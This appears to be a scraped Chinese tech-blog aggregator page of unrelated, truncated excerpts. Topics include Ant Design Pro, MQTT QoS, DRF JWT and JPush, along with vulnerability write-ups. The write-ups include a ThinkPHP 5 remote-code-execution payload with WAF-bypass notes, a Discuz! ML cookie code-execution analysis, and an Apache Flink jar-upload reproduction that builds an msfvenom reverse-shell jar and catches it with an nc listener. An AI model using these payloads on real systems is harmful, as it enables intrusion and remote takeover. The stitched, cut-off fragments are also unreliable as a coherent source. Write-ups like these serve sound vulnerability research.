payload

初探ant design pro

本秂侑毒 提交于 2019-11-28 23:40:25
1.增加路由子页面&配置菜单 因为ant design pro采取的是umi路由配置,所以只要在对应的文件夹下新建相关的文件夹以及文件,它会自动解析。按照如下的步骤做即可 PS.如果想要给菜单配置icon,ant design pro有一些通用的icon图标,可以在上面配置路由的时候在每个路由处都加上 icon:'iconname' 即可,这是最简单的方法。 配置了路由以后再给它配置相关的语言预设即可,在这里我只配置了中文和英文。 这样页面上的菜单就会有相应的配置了。 2.使用mock模拟后台数据调用 在service里写相应的请求接口的逻辑,这里的request是ant design pro里自定义的接口请求方法,封装了fetch方法。 然后在相应的组件内建立models,触发action获得数据(这里用的是redux的思想) 完整的代码如下: import { queryComment } from '@/services/geographic'; export default { namespace: 'geographic', //命名空间,这里与组件里连接到模块的connect方法里的参数对应 state: { comment:[], isLoading: false, }, //actions effects: { *fetchComment(_, { call,

ant design pro 初识

六月ゝ 毕业季﹏ 提交于 2019-11-28 23:40:03
发送请求 上次讲到在api.js中发送请求,模拟了假数据,这次讲一下调用真实接口进行请求并渲染页面。 先完整的过一遍请求吧 首先view层发送请求例如下面的代码: componentDidMount() { this.fetchListCallback(); } fetchListCallback = () => { const { limit, offset } = this.state; const { dispatch } = this.props; dispatch({ type: 'brandDiscountManage/fetchList', payload: { limit, offset, }, callback: (response)=>{ this.setState({ tableData: common(response.data.rows, 'discountId'), }) }, }) }; 这里调用了'brandDiscountManage'命名空间下的 fetchList 方法。 另外需要在路由层配置一下,引用的文件。 '/brandDiscountManage': { component: dynamicWrapper(app, ['brandDiscountManage'], () => import('../routes/brand

iOS: MDM Check-in samples

懵懂的女人 提交于 2019-11-28 20:39:58
问题 I am in early stage of Mobile Device Management implementation. I am in process to get iOS Enterprise developer account.I have already started exploring MDM Server implementation. I need some iOS sample Check-in data which is received from iOS device. These samples are required to understand to write APIs in server side,because these APIs should be common for Blackberry,Android and other mobile platforms. 回答1: You can get step by step all the sample plist in the MDM_Protocol document also.

MQTT系列 | MQTT的QoS介绍

a 夏天 提交于 2019-11-28 20:17:06
1. MQTT中的QoS等级 MQTT设计了一套保证消息稳定传输的机制,包括消息应答、存储和重传。在这套机制下,提供了三种不同层次QoS(Quality of Service): QoS0,At most once,至多一次; QoS1,At least once,至少一次; QoS2,Exactly once,确保只有一次。 QoS 是消息的发送方(Sender)和接受方(Receiver)之间达成的一个协议: QoS0 代表,Sender 发送的一条消息,Receiver 最多能收到一次,也就是说 Sender 尽力向 Receiver 发送消息,如果发送失败,也就算了; QoS1 代表,Sender 发送的一条消息,Receiver 至少能收到一次,也就是说 Sender 向 Receiver 发送消息,如果发送失败,会继续重试,直到 Receiver 收到消息为止,但是因为重传的原因,Receiver 有可能会收到重复的消息; QoS2 代表,Sender 发送的一条消息,Receiver 确保能收到而且只收到一次,也就是说 Sender 尽力向 Receiver 发送消息,如果发送失败,会继续重试,直到 Receiver 收到消息为止,同时保证 Receiver 不会因为消息重传而收到重复的消息。 注意: QoS是Sender和Receiver之间的协议

drf组件之jwt认证

末鹿安然 提交于 2019-11-28 14:47:48
drf组件之jwt认证模块 一、认证规则 全称:json web token 解释:加密字符串的原始数据是json,后台产生,通过web传输给前台存储 格式:三段式 - 头.载荷.签名 - 头和载荷用的是base64可逆加密,签名用md5不可逆加密 内容: 头(基础信息,也可以为空):加密方式、公司信息、项目组信息、... 载荷(核心信息):用户信息、过期时间、... 签名(安全保障):头加密结果+载荷加密结果+服务器秘钥 的md5加密结果 认证规则: 后台一定要保障 服务器秘钥 的安全性(它是jwt的唯一安全保障) 后台签发token(login接口 ) -> 前台存储 -> 发送需要认证的请求带着token -> 后台校验得到合法的用户 -> 权限管理 为什么要有jwt认证: 1)服务器压力小, 后台不需要存储token,只需要存储签发与校验token的算法,效率远远大于后台存储和取出token完成校验 2) jwt算法认证,更适合服务器集群部署 二、认证模块 安装:pip install djangorestframework-jwt 模块包:rest_framework_jwt 采用drf-jwt框架,后期任务只需要书写登录 为什么要重写登录:drf-jwt只完成了账号密码登录,我们还需要手机登录,邮箱登录 为什么不需要重写认证类:因为认证规则已经完成且固定不变

记一次有趣的tp5代码执行

人走茶凉 提交于 2019-11-28 14:07:47
0x00 前言 朋友之前给了个站,拿了很久终于拿下,简单记录一下。 0x01 基础信息 漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1 无回显,根据payload 成功判断目标thinkphp 版本应为5.0.23 有waf,waf拦截了以下内容 php标记: <?php <?= <? php 函数: base64_decode file_get_contents convert_uuencode 关键字: php:// linux disable_function禁用了以下函数 passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server php 7.1.7 (虽然 assert 函数不在disable_function中,但已经无法用 call_user_func 回调调用) 0x02 突破 现在tp 5

【Web_接口测试_Python3_Requests库】Requests数据库get/post/put/delete协议接口测试,自动化测试案例

我只是一个虾纸丫 提交于 2019-11-28 13:21:10
#!/usr/bin/env/python3 # -*- coding:utf-8 -*- ''' Author:leo Date&Time:2019-08-18 and 12:23 FileName:apiTest.py Description:... # 导入接口测试库 import requests,json,time from pprint import pprint # 配置fiddler代理,请求后面带上proxies=proxies, verify=False,就可以通过fiddler拦截请求 # proxies = {'http': 'http://localhost:****', 'https':'http://localhost:****'} # response = requests.post(url, data=payload, proxies=proxies, verify=False) # 测试环境Host(ip等铭感信息建议放在单独的py文件中) testHost = "127.0.0.1:****" # 获取当前时间戳 nowTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())) #基本类(后面类都继承并调用该类) class Basic: # 登录账户 def

Discuz! ML远程代码执行(CVE-2019-13956)

喜夏-厌秋 提交于 2019-11-28 10:17:29
Discuz! ML远程代码执行(CVE-2019-13956) 一、漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 1、 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 2、 将压缩包解压到phpstudy网站根目录,浏览器访问upload目录开始安装    3、然后就是一直点击下一步就可以了,直到完成安装    四、漏洞复现 1、漏洞存在的位置/upload/source/module/portal/portal_index.php,使用template函数处理’diy:portal/index’,然后使用include_once包含    2、跟进template函数,发现把DISCUZ_LANG函数拼接成为一个缓存文件名,然后又返回了缓存文件名    3、跟进DISCUZ_LANG函数,发现从cookie中取language的值给$lng    4、继续浏览代码,发现把$lng的值赋给DISCUZ_LANG了    5、到此为止,整个漏洞分析过程已结束,过程如下: 外部参数$lng

【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

落花浮王杯 提交于 2019-11-28 08:39:09
前言 记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持! 致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章! 0x01 漏洞描述 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 影响范围:<= 1.9.1(最新版本) 可能是我测的比较少,成功的概率1.9版本比较高。 0x02 漏洞威胁等级 高危 可导致远程代码执行 0x03 漏洞复现 第一步生成payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar 名字可以任意取 第二步生成监听端口,这里我选择nc监听端口。 nc -lvp 8000 第三步上传payload 最后直接返回shell 接着执行命令 0x04 复现那些坑 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。 官方Sunny-ngrok教程 客户端工具下载地址 0x05 批量检测脚本 GitHub地址 脚本源码 """ auth: @l3_W0ng version

极光推送java服务端-通知(2)

血红的双手。 提交于 2019-11-28 08:11:46
1.下载SDK REST API为极光推送开发API 2.下载好后,maven导入后可以参考示例 官方demo 4.小demo // 设置好账号的app_key和masterSecret是必须的 private static String APP_KEY = "你的app_key"; private static String MASTER_SECRET = "你的master_secret"; //极光推送>>Android //Map<String, String> parm是我自己传过来的参数,同学们可以自定义参数 public static void jpushAndroid(Map<String, String> parm) { Map<String, String> extras = new HashMap<String, String>(); // extras.put("test", "https://community.jiguang.cn/push"); extras.put("type", "2");//变色龙云必须设置type=2 extras.put("url", "http://localhost:8080/index"); //创建JPushClient JPushClient jpushClient = new JPushClient(MASTER